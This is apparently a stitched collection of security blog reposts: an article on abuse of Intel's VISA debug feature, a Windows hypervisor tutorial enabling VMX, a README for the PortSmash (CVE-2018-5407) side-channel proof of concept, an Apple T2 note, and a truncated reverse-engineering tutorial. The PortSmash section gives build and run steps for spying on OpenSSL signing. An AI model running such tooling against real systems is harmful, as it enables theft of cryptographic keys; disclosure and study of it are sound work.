Researchers discover and abuse new undocumented feature in Intel chipsets

Original text by Catalin Cimpanu

Researchers find new Intel VISA (Visualization of Internal Signals Architecture) debugging technology.

At the Black Hat Asia 2019 security conference, security researchers from Positive Technologies disclosed the existence of a previously unknown and undocumented feature in Intel chipsets.

Called Intel Visualization of Internal Signals Architecture (Intel VISA), Positive Technologies researchers Maxim Goryachy and Mark Ermolov said this is a new utility included in modern Intel chipsets to help with testing and debugging on manufacturing lines.

VISA is included with Platform Controller Hub (PCH) chipsets part of modern Intel CPUs and works like a full-fledged logic signal analyzer.

PCH
Image: Wikimedia Commons

According to the two researchers, VISA intercepts electronic signals sent from internal buses and peripherals (display, keyboard, and webcam) to the PCH —and later the main CPU.

VISA EXPOSES A COMPUTER’S ENTIRE DATA

Unauthorized access to the VISA feature would allow a threat actor to intercept data from the computer memory and create spyware that works at the lowest possible level.

But despite its extremely intrusive nature, very little is known about this new technology. Goryachy and Ermolov said VISA’s documentation is subject to a non-disclosure agreement, and not available to the general public.

Normally, this combination of secrecy and a secure default should keep Intel users safe from possible attacks and abuse.

However, the two researchers said they found several methods of enabling VISA and abusing it to sniff data that passes through the CPU, and even through the secretive Intel Management Engine (ME), which has been housed in the PCH since the release of the Nehalem processors and 5-Series chipsets.

INTEL SAYS IT’S SAFE. RESEARCHERS DISAGREE.

Goryachy and Ermolov said their technique doesn’t require hardware modifications to a computer’s motherboard and no specific equipment to carry out.

The simplest method consists of using the vulnerabilities detailed in Intel’s Intel-SA-00086security advisory to take control of the Intel Management Engine and enable VISA that way.

«The Intel VISA issue, as discussed at BlackHat Asia, relies on physical access and a previously mitigated vulnerability addressed in INTEL-SA-00086 on November 20, 2017,» an Intel spokesperson told ZDNet yesterday.

«Customers who have applied those mitigations are protected from known vectors,» the company said.

However, in an online discussion after his Black Hat talk, Ermolov said the Intel-SA-00086 fixes are not enough, as Intel firmware can be downgraded to vulnerable versions where the attackers can take over Intel ME and later enable VISA.

Furthermore, Ermolov said that there are three other ways to enable Intel VISA, methods that will become public when Black Hat organizers will publish the duo’s presentation slides in the coming days.

As Ermolov said yesterday, VISA is not a vulnerability in Intel chipsets, but just another way in which a useful feature could be abused and turned against users. Chances that VISA will be abused are low. This is because if someone would go through the trouble of exploiting the Intel-SA-00086 vulnerabilities to take over Intel ME, then they’ll likely use that component to carry out their attacks, rather than rely on VISA.

As a side note, this is the second «manufacturing mode» feature Goryachy and Ermolov found in the past year. They also found that Apple accidentally shipped some laptops with Intel CPUs that were left in «manufacturing mode.»

Реклама

Hypervisor From Scratch – Part 2: Entering VMX Operation

Original text bySinaei )

Hi guys,

It’s the second part of a multiple series of a tutorial called “Hypervisor From Scratch”, First I highly recommend to read the first part (Basic Concepts & Configure Testing Environment) before reading this part, as it contains the basic knowledge you need to know in order to understand the rest of this tutorial.

In this section, we will learn about Detecting Hypervisor Support for our processor, then we simply config the basic stuff to Enable VMX and Entering VMX Operation and a lot more thing about Window Driver Kit (WDK).

Configuring Our IRP Major Functions

Beside our kernel-mode driver (“MyHypervisorDriver“), I created a user-mode application called “MyHypervisorApp“, first of all (The source code is available in my GitHub), I should encourage you to write most of your codes in user-mode rather than kernel-mode and that’s because you might not have handled exceptions so it leads to BSODs, or on the other hand, running less code in kernel-mode reduces the possibility of putting some nasty kernel-mode bugs.

If you remember from the previous part, we create some Windows Driver Kit codes, now we want to develop our project to support more IRP Major Functions.

IRP Major Functions are located in a conventional Windows table that is created for every device, once you register your device in Windows, you have to introduce these functions in which you handle these IRP Major Functions. That’s like every device has a table of its Major Functions and everytime a user-mode application calls any of these functions, Windows finds the corresponding function (if device driver supports that MJ Function) based on the device that requested by the user and calls it then pass an IRP pointer to the kernel driver.

Now its responsibility of device function to check the privileges or etc.

The following code creates the device :

12345678910111213 NTSTATUS NtStatus = STATUS_SUCCESS; UINT64 uiIndex = 0; PDEVICE_OBJECT pDeviceObject = NULL; UNICODE_STRING usDriverName, usDosDeviceName;  DbgPrint(«[*] DriverEntry Called.»);   RtlInitUnicodeString(&usDriverName, L»\\Device\\MyHypervisorDevice»); RtlInitUnicodeString(&usDosDeviceName, L»\\DosDevices\\MyHypervisorDevice»);  NtStatus = IoCreateDevice(pDriverObject, 0, &usDriverName, FILE_DEVICE_UNKNOWN, FILE_DEVICE_SECURE_OPEN, FALSE, &pDeviceObject); NTSTATUS NtStatusSymLinkResult = IoCreateSymbolicLink(&usDosDeviceName, &usDriverName);

Note that our device name is “\Device\MyHypervisorDevice.

After that, we need to introduce our Major Functions for our device.

1234567891011121314151617 if (NtStatus == STATUS_SUCCESS && NtStatusSymLinkResult == STATUS_SUCCESS) { for (uiIndex = 0; uiIndex < IRP_MJ_MAXIMUM_FUNCTION; uiIndex++) pDriverObject->MajorFunction[uiIndex] = DrvUnsupported;  DbgPrint(«[*] Setting Devices major functions.»); pDriverObject->MajorFunction[IRP_MJ_CLOSE] = DrvClose; pDriverObject->MajorFunction[IRP_MJ_CREATE] = DrvCreate; pDriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = DrvIOCTLDispatcher; pDriverObject->MajorFunction[IRP_MJ_READ] = DrvRead; pDriverObject->MajorFunction[IRP_MJ_WRITE] = DrvWrite;  pDriverObject->DriverUnload = DrvUnload; } else { DbgPrint(«[*] There was some errors in creating device.»); }

You can see that I put “DrvUnsupported” to all functions, this is a function to handle all MJ Functions and told the user that it’s not supported. The main body of this function is like this:

12345678910NTSTATUS DrvUnsupported(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ DbgPrint(«[*] This function is not supported 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;}

We also introduce other major functions that are essential for our device, we’ll complete the implementation in the future, let’s just leave them alone.

12345678910111213141516171819202122232425262728293031323334353637383940414243NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ DbgPrint(«[*] Not implemented yet 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;} NTSTATUS DrvRead(IN PDEVICE_OBJECT DeviceObject,IN PIRP Irp){ DbgPrint(«[*] Not implemented yet 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;} NTSTATUS DrvWrite(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ DbgPrint(«[*] Not implemented yet 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;} NTSTATUS DrvClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ DbgPrint(«[*] Not implemented yet 🙁 !»);  Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp, IO_NO_INCREMENT);  return STATUS_SUCCESS;}

Now let’s see IRP MJ Functions list and other types of Windows Driver Kit handlers routine.

IRP Major Functions List

This is a list of IRP Major Functions which we can use in order to perform different operations.

123456789101112131415161718192021222324252627282930#define IRP_MJ_CREATE                   0x00#define IRP_MJ_CREATE_NAMED_PIPE        0x01#define IRP_MJ_CLOSE                    0x02#define IRP_MJ_READ                     0x03#define IRP_MJ_WRITE                    0x04#define IRP_MJ_QUERY_INFORMATION        0x05#define IRP_MJ_SET_INFORMATION          0x06#define IRP_MJ_QUERY_EA                 0x07#define IRP_MJ_SET_EA                   0x08#define IRP_MJ_FLUSH_BUFFERS            0x09#define IRP_MJ_QUERY_VOLUME_INFORMATION 0x0a#define IRP_MJ_SET_VOLUME_INFORMATION   0x0b#define IRP_MJ_DIRECTORY_CONTROL        0x0c#define IRP_MJ_FILE_SYSTEM_CONTROL      0x0d#define IRP_MJ_DEVICE_CONTROL           0x0e#define IRP_MJ_INTERNAL_DEVICE_CONTROL  0x0f#define IRP_MJ_SHUTDOWN                 0x10#define IRP_MJ_LOCK_CONTROL             0x11#define IRP_MJ_CLEANUP                  0x12#define IRP_MJ_CREATE_MAILSLOT          0x13#define IRP_MJ_QUERY_SECURITY           0x14#define IRP_MJ_SET_SECURITY             0x15#define IRP_MJ_POWER                    0x16#define IRP_MJ_SYSTEM_CONTROL           0x17#define IRP_MJ_DEVICE_CHANGE            0x18#define IRP_MJ_QUERY_QUOTA              0x19#define IRP_MJ_SET_QUOTA                0x1a#define IRP_MJ_PNP                      0x1b#define IRP_MJ_PNP_POWER                IRP_MJ_PNP      // Obsolete….#define IRP_MJ_MAXIMUM_FUNCTION         0x1b

Every major function will only trigger if we call its corresponding function from user-mode. For instance, there is a function (in user-mode) called CreateFile (And all its variants like CreateFileA and CreateFileW for ASCII and Unicode) so everytime we call CreateFile the function that registered as IRP_MJ_CREATE will be called or if we call ReadFile then IRP_MJ_READ and WriteFile then IRP_MJ_WRITE  will be called. You can see that Windows treats its devices like files and everything we need to pass from user-mode to kernel-mode is available in PIRP Irp as a buffer when the function is called.

In this case, Windows is responsible to copy user-mode buffer to kernel mode stack.

Don’t worry we use it frequently in the rest of the project but we only support IRP_MJ_CREATE in this part and left others unimplemented for our future parts.

IRP Minor Functions

IRP Minor functions are mainly used for PnP manager to notify for a special event, for example,The PnP manager sends IRP_MN_START_DEVICE  after it has assigned hardware resources, if any, to the device or The PnP manager sends IRP_MN_STOP_DEVICE to stop a device so it can reconfigure the device’s hardware resources.

We will need these minor functions later in these series.

A list of IRP Minor Functions is available below:

1234567891011121314151617181920212223IRP_MN_START_DEVICEIRP_MN_QUERY_STOP_DEVICEIRP_MN_STOP_DEVICEIRP_MN_CANCEL_STOP_DEVICEIRP_MN_QUERY_REMOVE_DEVICEIRP_MN_REMOVE_DEVICEIRP_MN_CANCEL_REMOVE_DEVICEIRP_MN_SURPRISE_REMOVALIRP_MN_QUERY_CAPABILITIES IRP_MN_QUERY_PNP_DEVICE_STATEIRP_MN_FILTER_RESOURCE_REQUIREMENTSIRP_MN_DEVICE_USAGE_NOTIFICATIONIRP_MN_QUERY_DEVICE_RELATIONSIRP_MN_QUERY_RESOURCESIRP_MN_QUERY_RESOURCE_REQUIREMENTSIRP_MN_QUERY_IDIRP_MN_QUERY_DEVICE_TEXTIRP_MN_QUERY_BUS_INFORMATIONIRP_MN_QUERY_INTERFACEIRP_MN_READ_CONFIGIRP_MN_WRITE_CONFIGIRP_MN_DEVICE_ENUMERATEDIRP_MN_SET_LOCK

Fast I/O

For optimizing VMM, you can use Fast I/O which is a different way to initiate I/O operations that are faster than IRP. Fast I/O operations are always synchronous.

According to MSDN:

Fast I/O is specifically designed for rapid synchronous I/O on cached files. In fast I/O operations, data is transferred directly between user buffers and the system cache, bypassing the file system and the storage driver stack. (Storage drivers do not use fast I/O.) If all of the data to be read from a file is resident in the system cache when a fast I/O read or write request is received, the request is satisfied immediately. 

When the I/O Manager receives a request for synchronous file I/O (other than paging I/O), it invokes the fast I/O routine first. If the fast I/O routine returns TRUE, the operation was serviced by the fast I/O routine. If the fast I/O routine returns FALSE, the I/O Manager creates and sends an IRP instead.

The definition of Fast I/O Dispatch table is:

123456789101112131415161718192021222324252627282930typedef struct _FAST_IO_DISPATCH {  ULONG                                  SizeOfFastIoDispatch;  PFAST_IO_CHECK_IF_POSSIBLE             FastIoCheckIfPossible;  PFAST_IO_READ                          FastIoRead;  PFAST_IO_WRITE                         FastIoWrite;  PFAST_IO_QUERY_BASIC_INFO              FastIoQueryBasicInfo;  PFAST_IO_QUERY_STANDARD_INFO           FastIoQueryStandardInfo;  PFAST_IO_LOCK                          FastIoLock;  PFAST_IO_UNLOCK_SINGLE                 FastIoUnlockSingle;  PFAST_IO_UNLOCK_ALL                    FastIoUnlockAll;  PFAST_IO_UNLOCK_ALL_BY_KEY             FastIoUnlockAllByKey;  PFAST_IO_DEVICE_CONTROL                FastIoDeviceControl;  PFAST_IO_ACQUIRE_FILE                  AcquireFileForNtCreateSection;  PFAST_IO_RELEASE_FILE                  ReleaseFileForNtCreateSection;  PFAST_IO_DETACH_DEVICE                 FastIoDetachDevice;  PFAST_IO_QUERY_NETWORK_OPEN_INFO       FastIoQueryNetworkOpenInfo;  PFAST_IO_ACQUIRE_FOR_MOD_WRITE         AcquireForModWrite;  PFAST_IO_MDL_READ                      MdlRead;  PFAST_IO_MDL_READ_COMPLETE             MdlReadComplete;  PFAST_IO_PREPARE_MDL_WRITE             PrepareMdlWrite;  PFAST_IO_MDL_WRITE_COMPLETE            MdlWriteComplete;  PFAST_IO_READ_COMPRESSED               FastIoReadCompressed;  PFAST_IO_WRITE_COMPRESSED              FastIoWriteCompressed;  PFAST_IO_MDL_READ_COMPLETE_COMPRESSED  MdlReadCompleteCompressed;  PFAST_IO_MDL_WRITE_COMPLETE_COMPRESSED MdlWriteCompleteCompressed;  PFAST_IO_QUERY_OPEN                    FastIoQueryOpen;  PFAST_IO_RELEASE_FOR_MOD_WRITE         ReleaseForModWrite;  PFAST_IO_ACQUIRE_FOR_CCFLUSH           AcquireForCcFlush;  PFAST_IO_RELEASE_FOR_CCFLUSH           ReleaseForCcFlush;} FAST_IO_DISPATCH, *PFAST_IO_DISPATCH;

Defined Headers

I created the following headers (source.h) for my driver.

12345678910111213141516171819202122232425262728293031323334#pragma once#include <ntddk.h>#include <wdf.h>#include <wdm.h> extern void inline Breakpoint(void);extern void inline Enable_VMX_Operation(void);  NTSTATUS DriverEntry(PDRIVER_OBJECT  pDriverObject, PUNICODE_STRING  pRegistryPath);VOID DrvUnload(PDRIVER_OBJECT  DriverObject);NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvRead(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvWrite(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvClose(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvUnsupported(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp);NTSTATUS DrvIOCTLDispatcher(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp); VOID PrintChars(_In_reads_(CountChars) PCHAR BufferAddress, _In_ size_t CountChars);VOID PrintIrpInfo(PIRP Irp); #pragma alloc_text(INIT, DriverEntry)#pragma alloc_text(PAGE, DrvUnload)#pragma alloc_text(PAGE, DrvCreate)#pragma alloc_text(PAGE, DrvRead)#pragma alloc_text(PAGE, DrvWrite)#pragma alloc_text(PAGE, DrvClose)#pragma alloc_text(PAGE, DrvUnsupported)#pragma alloc_text(PAGE, DrvIOCTLDispatcher)   // IOCTL Codes and Its meanings#define IOCTL_TEST 0x1 // In case of testing

Now just compile your driver.

Loading Driver and Check the presence of Device

In order to load our driver (MyHypervisorDriver) first download OSR Driver Loader, then run Sysinternals DbgView as administrator make sure that your DbgView captures the kernel (you can check by going Capture -> Capture Kernel).

Enable Capturing Event

After that open the OSR Driver Loader (go to OsrLoader -> kit-> WNET -> AMD64 -> FRE) and open OSRLOADER.exe (in an x64 environment). Now if you built your driver, find .sys file (in MyHypervisorDriver\x64\Debug\ should be a file named: “MyHypervisorDriver.sys”), in OSR Driver Loader click to browse and select (MyHypervisorDriver.sys) and then click to “Register Service” after the message box that shows your driver registered successfully, you should click on “Start Service”.

Please note that you should have WDK installed for your Visual Studio in order to be able building your project.

Load Driver in OSR Driver Loader

Now come back to DbgView, then you should see that your driver loaded successfully and a message “[*] DriverEntry Called. ” should appear.

If there is no problem then you’re good to go, otherwise, if you have a problem with DbgView you can check the next step.

Keep in mind that now you registered your driver so you can use SysInternals WinObj in order to see whether “MyHypervisorDevice” is available or not.

WinObj

The Problem with DbgView

Unfortunately, for some unknown reasons, I’m not able to view the result of DbgPrint(), If you can see the result then you can skip this step but if you have a problem, then perform the following steps:

As I mentioned in part 1:

In regedit, add a key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Debug Print Filter

Under that , add a DWORD value named IHVDRIVER with a value of 0xFFFF

Reboot the machine and you’ll good to go.

It always works for me and I tested on many computers but my MacBook seems to have a problem.

In order to solve this problem, you need to find a Windows Kernel Global variable called, nt!Kd_DEFAULT_Mask, this variable is responsible for showing the results in DbgView, it has a mask that I’m not aware of so I just put a 0xffffffff in it to simply make it shows everything!

To do this, you need a Windows Local Kernel Debugging using Windbg.

  1. Open a Command Prompt window as Administrator. Enter bcdedit /debug on
  2. If the computer is not already configured as the target of a debug transport, enter bcdedit /dbgsettings local
  3. Reboot the computer.

After that you need to open Windbg with UAC Administrator privilege, go to File > Kernel Debug > Local > press OK and in you local Windbg find the nt!Kd_DEFAULT_Mask using the following command :

12prlkd> x nt!kd_Default_Maskfffff801`f5211808 nt!Kd_DEFAULT_Mask = <no type information>

Now change it value to 0xffffffff.

1lkd> eb fffff801`f5211808 ff ff ff ff
kd_DEFAULT_Mask

After that, you should see the results and now you’ll good to go.

Remember this is an essential step for the rest of the topic, because if we can’t see any kernel detail then we can’t debug.

DbgView

Detecting Hypervisor Support

Discovering support for vmx is the first thing that you should consider before enabling VT-x, this is covered in Intel Software Developer’s Manual volume 3C in section 23.6 DISCOVERING SUPPORT FOR VMX.

You could know the presence of VMX using CPUID if CPUID.1:ECX.VMX[bit 5] = 1, then VMX operation is supported.

First of all, we need to know if we’re running on an Intel-based processor or not, this can be understood by checking the CPUID instruction and find vendor string “GenuineIntel“.

The following function returns the vendor string form CPUID instruction.

12345678910111213141516171819202122232425262728293031323334353637string GetCpuID(){ //Initialize used variables char SysType[13]; //Array consisting of 13 single bytes/characters string CpuID; //The string that will be used to add all the characters to   //Starting coding in assembly language _asm { //Execute CPUID with EAX = 0 to get the CPU producer XOR EAX, EAX CPUID //MOV EBX to EAX and get the characters one by one by using shift out right bitwise operation. MOV EAX, EBX MOV SysType[0], al MOV SysType[1], ah SHR EAX, 16 MOV SysType[2], al MOV SysType[3], ah //Get the second part the same way but these values are stored in EDX MOV EAX, EDX MOV SysType[4], al MOV SysType[5], ah SHR EAX, 16 MOV SysType[6], al MOV SysType[7], ah //Get the third part MOV EAX, ECX MOV SysType[8], al MOV SysType[9], ah SHR EAX, 16 MOV SysType[10], al MOV SysType[11], ah MOV SysType[12], 00 } CpuID.assign(SysType, 12); return CpuID;}

The last step is checking for the presence of VMX, you can check it using the following code :

1234567891011121314151617181920bool VMX_Support_Detection(){  bool VMX = false; __asm { xor    eax, eax inc    eax cpuid bt     ecx, 0x5 jc     VMXSupport VMXNotSupport : jmp     NopInstr VMXSupport : mov    VMX, 0x1 NopInstr : nop }  return VMX;}

As you can see it checks CPUID with EAX=1 and if the 5th (6th) bit is 1 then the VMX Operation is supported. We can also perform the same thing in Kernel Driver.

All in all, our main code should be something like this:

123456789101112131415161718192021222324252627int main(){ string CpuID; CpuID = GetCpuID(); cout << «[*] The CPU Vendor is : » << CpuID << endl; if (CpuID == «GenuineIntel») { cout << «[*] The Processor virtualization technology is VT-x. \n»; } else { cout << «[*] This program is not designed to run in a non-VT-x environemnt !\n»; return 1; } if (VMX_Support_Detection()) { cout << «[*] VMX Operation is supported by your processor .\n»; } else { cout << «[*] VMX Operation is not supported by your processor .\n»; return 1; } _getch();    return 0;}

The final result:

User-mode app

Enabling VMX Operation

If our processor supports the VMX Operation then its time to enable it. As I told you above, IRP_MJ_CREATE is the first function that should be used to start the operation.

Form Intel Software Developer’s Manual (23.7 ENABLING AND ENTERING VMX OPERATION):

Before system software can enter VMX operation, it enables VMX by setting CR4.VMXE[bit 13] = 1. VMX operation is then entered by executing the VMXON instruction. VMXON causes an invalid-opcode exception (#UD) if executed with CR4.VMXE = 0. Once in VMX operation, it is not possible to clear CR4.VMXE. System software leaves VMX operation by executing the VMXOFF instruction. CR4.VMXE can be cleared outside of VMX operation after executing of VMXOFF.
VMXON is also controlled by the IA32_FEATURE_CONTROL MSR (MSR address 3AH). This MSR is cleared to zero when a logical processor is reset. The relevant bits of the MSR are:

  •  Bit 0 is the lock bit. If this bit is clear, VMXON causes a general-protection exception. If the lock bit is set, WRMSR to this MSR causes a general-protection exception; the MSR cannot be modified until a power-up reset condition. System BIOS can use this bit to provide a setup option for BIOS to disable support for VMX. To enable VMX support in a platform, BIOS must set bit 1, bit 2, or both, as well as the lock bit.
  •  Bit 1 enables VMXON in SMX operation. If this bit is clear, execution of VMXON in SMX operation causes a general-protection exception. Attempts to set this bit on logical processors that do not support both VMX operation and SMX operation cause general-protection exceptions.
  •  Bit 2 enables VMXON outside SMX operation. If this bit is clear, execution of VMXON outside SMX operation causes a general-protection exception. Attempts to set this bit on logical processors that do not support VMX operation cause general-protection exceptions.

Setting CR4 VMXE Bit

Do you remember the previous part where I told you how to create an inline assembly in Windows Driver Kit x64

Now you should create some function to perform this operation in assembly.

Just in Header File (in my case Source.h) declare your function:

1extern void inline Enable_VMX_Operation(void);

Then in assembly file (in my case SourceAsm.asm) add this function (Which set the 13th (14th) bit of Cr4).

1234567891011Enable_VMX_Operation PROC PUBLICpush rax ; Save the state xor rax,rax ; Clear the RAXmov rax,cr4or rax,02000h         ; Set the 14th bitmov cr4,rax pop rax ; Restore the stateretEnable_VMX_Operation ENDP

Also, declare your function in the above of SourceAsm.asm.

1PUBLIC Enable_VMX_Operation

The above function should be called in DrvCreate:

123456NTSTATUS DrvCreate(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp){ Enable_VMX_Operation(); // Enabling VMX Operation DbgPrint(«[*] VMX Operation Enabled Successfully !»); return STATUS_SUCCESS;}

At last, you should call the following function from the user-mode:

123456789 HANDLE hWnd = CreateFile(L»\\\\.\\MyHypervisorDevice», GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, /// lpSecurityAttirbutes OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_OVERLAPPED, NULL); /// lpTemplateFile

If you see the following result, then you completed the second part successfully.

Final Show

Important Note: Please consider that your .asm file should have a different name from your driver main file (.c file) for example if your driver file is “Source.c” then using the name “Source.asm” causes weird linking errors in Visual Studio, you should change the name of you .asm file to something like “SourceAsm.asm” to avoid these kinds of linker errors.

Conclusion

In this part, you learned about basic stuff you to know in order to create a Windows Driver Kit program and then we entered to our virtual environment so we build a cornerstone for the rest of the parts.

In the third part, we’re getting deeper with Intel VT-x and make our driver even more advanced so wait, it’ll be ready soon!

The source code of this topic is available at :

[https://github.com/SinaKarvandi/Hypervisor-From-Scratch/]

References

[1] Intel® 64 and IA-32 architectures software developer’s manual combined volumes 3 (https://software.intel.com/en-us/articles/intel-sdm

[2] IRP_MJ_DEVICE_CONTROL (https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/irp-mj-device-control)

[3]  Windows Driver Kit Samples (https://github.com/Microsoft/Windows-driver-samples/blob/master/general/ioctl/wdm/sys/sioctl.c)

[4] Setting Up Local Kernel Debugging of a Single Computer Manually (https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/setting-up-local-kernel-debugging-of-a-single-computer-manually)

[5] Obtain processor manufacturer using CPUID (https://www.daniweb.com/programming/software-development/threads/112968/obtain-processor-manufacturer-using-cpuid)

[6] Plug and Play Minor IRPs (https://docs.microsoft.com/en-us/windows-hardware/drivers/kernel/plug-and-play-minor-irps)

[7] _FAST_IO_DISPATCH structure (https://docs.microsoft.com/en-us/windows-hardware/drivers/ddi/content/wdm/ns-wdm-_fast_io_dispatch)

[8] Filtering IRPs and Fast I/O (https://docs.microsoft.com/en-us/windows-hardware/drivers/ifs/filtering-irps-and-fast-i-o)

[9] Windows File System Filter Driver Development (https://www.apriorit.com/dev-blog/167-file-system-filter-driver)

CVE-2018-5407 (Flaw in the Intel processor execution engine sharing on SMT (e.g. Hyper-Threading) architectures.) POC ,

Summary

This is a proof-of-concept exploit of the PortSmash microarchitecture attack, tracked by CVE-2018-5407.

Alt text

Setup

Prerequisites

A CPU featuring SMT (e.g. Hyper-Threading) is the only requirement.

This exploit code should work out of the box on Skylake and Kaby Lake. For other SMT architectures, customizing the strategies and/or waiting times in spy is likely needed.

OpenSSL

Download and install OpenSSL 1.1.0h or lower:

cd /usr/local/src
wget https://www.openssl.org/source/openssl-1.1.0h.tar.gz
tar xzf openssl-1.1.0h.tar.gz
cd openssl-1.1.0h/
export OPENSSL_ROOT_DIR=/usr/local/ssl
./config -d shared --prefix=$OPENSSL_ROOT_DIR --openssldir=$OPENSSL_ROOT_DIR -Wl,-rpath=$OPENSSL_ROOT_DIR/lib
make -j8
make test
sudo checkinstall --strip=no --stripso=no --pkgname=openssl-1.1.0h-debug --provides=openssl-1.1.0h-debug --default make install_sw

If you use a different path, you’ll need to make changes to Makefile and sync.sh.

Tooling

freq.sh

Turns off frequency scaling and TurboBoost.

sync.sh

Sync trace through pipes. It has two victims, one of which should be active at a time:

  1. The stock openssl running dgst command to produce a P-384 signature.
  2. A harness ecc that calls scalar multiplication directly with a known key. (Useful for profiling.)

The script will generate a P-384 key pair in secp384r1.pem if it does not already exist.

The script outputs data.bin which is what openssl dgst signed, and you should be able to verify the ECDSA signature data.sig afterwards with

openssl dgst -sha512 -verify secp384r1.pem -signature data.sig data.bin

In the ecc tool case, data.bin and secp384r1.pem are meaningless and data.sig is not created.

For the taskset commands in sync.sh, the cores need to be two logical cores of the same physical core; sanity check with

$ grep '^core id' /proc/cpuinfo
core id		: 0
core id		: 1
core id		: 2
core id		: 3
core id		: 0
core id		: 1
core id		: 2
core id		: 3

So the script is currently configured for logical cores 3 and 7 that both map to physical core 3 (core_id).

spy

Measurement process that outputs measurements in timings.bin. To change the spy strategy, check the port defines in spy.h. Only one strategy should be active at build time.

Note that timings.bin is actually raw clock cycle counter values, not latencies. Look in parse_raw_simple.py to understand the data format if necessary.

ecc

Victim harness for running OpenSSL scalar multiplication with known inputs. Example:

./ecc M 4 deadbeef0123456789abcdef00000000c0ff33

Will execute 4 consecutive calls to EC_POINT_mul with the given hex scalar.

parse_raw_simple.py

Quick and dirty hack to view 1D traces. The top plot is the raw trace. Everything below is a different digital filter of the raw trace for viewing purposes. Zoom and pan are your friends here.

You might have to adjust the CEIL variable if the plots are too aggressively clipped.

Python packages:

sudo apt-get install python-numpy python-matplotlib

Usage

Turn off frequency scaling:

./freq.sh

Make sure everything builds:

make clean
make

Take a measurement:

./sync.sh

View the trace:

python parse_raw_simple.py timings.bin

You can play around with one victim at a time in sync.sh. Sample output for the openssl dgst victim is in parse_raw_simple.png.

Credits

  • Alejandro Cabrera Aldaya (Universidad Tecnológica de la Habana (CUJAE), Habana, Cuba)
  • Billy Bob Brumley (Tampere University of Technology, Tampere, Finland)
  • Sohaib ul Hassan (Tampere University of Technology, Tampere, Finland)
  • Cesar Pereida García (Tampere University of Technology, Tampere, Finland)
  • Nicola Tuveri (Tampere University of Technology, Tampere, Finland)

Apple T2 security chip on new Macbook prevents software from using the mic to eavesdrop

( Original text by BY  )

Apple MacBook is equipped with a new T2 security chip, which uses a hard-breaking design, can automatically disable the microphone when necessary – such as closing the laptop screen. It is reported that the Apple T2 security chip is bundled with the Secure Enclave security zone coprocessor, which is designed to support MacOS’s Apple File System (APFS) encrypted storage, Touch ID, secure boot and more.

In addition, the chip has a number of controllers that integrate management functions for the system, SSD, audio, and image signal processors. As described in the Apple T2 Chip Security Overview document published in October 2018:

“All Mac portables with the Apple T2 Security Chip feature a hardware disconnect that ensures that the microphone is disabled whenever the lid 
is closed.”

As a result, when the MacBook is closed, even users running with the kernel or root privileges cannot eavesdrop on users. The webcam won’t be disconnected from the hardware when the screen is closed. Apple said: “The camera is not disconnected in hardware because its field of view 
 is completely obstructed with the lid closed.” This hardware-based protection makes it extremely difficult for malicious attackers to eavesdrop.

 

Reverse Engineering Advanced Programming Concepts

BOLO: Reverse Engineering — Part 2 (Advanced Programming Concepts)

Preface

Throughout this article we will be breaking down the following programming concepts and analyzing the decompiled assembly versions of each instruction:

  1. Arrays
  2. Pointers
  3. Dynamic Memory Allocation
  4. Socket Programming (Network Programming)
  5. Threading

For the Part 1 of the BOLO: Reverse Engineering series, please click here.

Please note: While this article uses IDA Pro to disassemble the compiled code, many of the features of IDA Pro (i.e. graphing, pseudocode translation, etc.) can be found in plugins and builds for other free disassemblers such as radare2. Furthermore, while preparing for this article I took the liberty of changing some variable names in the disassembled code from IDA presets like “v20” to what they correspond to in the C code. This was done to make each portion easier to understand. Finally, please note that this C code was compiled into a 64 bit executable and disassembled with IDA Pro’s 64 bit version. This can be especially seen when calculating array sizes, as the 32 bit registers (i.e. eax) are often doubled in size and transformed into 64 bit registers (i.e rax).

Ok, Let’s begin!

While Part 1 broke down and described basic programming concepts like loops and IF statements, this article is meant to explain more advanced topics that you would have to decipher when reverse engineering.

Arrays

Let’s begin with Arrays, First, let’s take a look at the code as a whole:

Basic Arrays — Code

Now, let’s take a look at the decompiled assembly as a whole:

Basic Arrays — Decompiled assembly overview

As you can see, the 12 lines of code turned into quite a large block of code. But don’t be intimidated! Remember, all we’re doing here is setting up arrays!

Let’s break it down bit by bit:

Declaring an array with a literal — disassembled

When initializing an array with an integer literal, the compiler simply initializes the length through a local variable.

EDIT: The above photo labeled “Declaring an array with a literal — disassembled” is actually labeled incorrectly. While yes, when initializing an array with an integer literal the compiler does first initialize the length through a local variable, the above screenshot is actually the initialization of a stack canary. Stack Canaries are used to detect overflow attacks that may, if unmitigated, lead to execution of malicious code. During compilation the compiler allocated enough space for the only litArray element that would be used, litArray[0] (see photo below labeled “local variables — Arrays” — as you can see, the only litArray element that was allocated for is litArray[0]). Compiler optimization can significantly enhance the speed of applications.
Sorry for the confusion!

local variables — Arrays
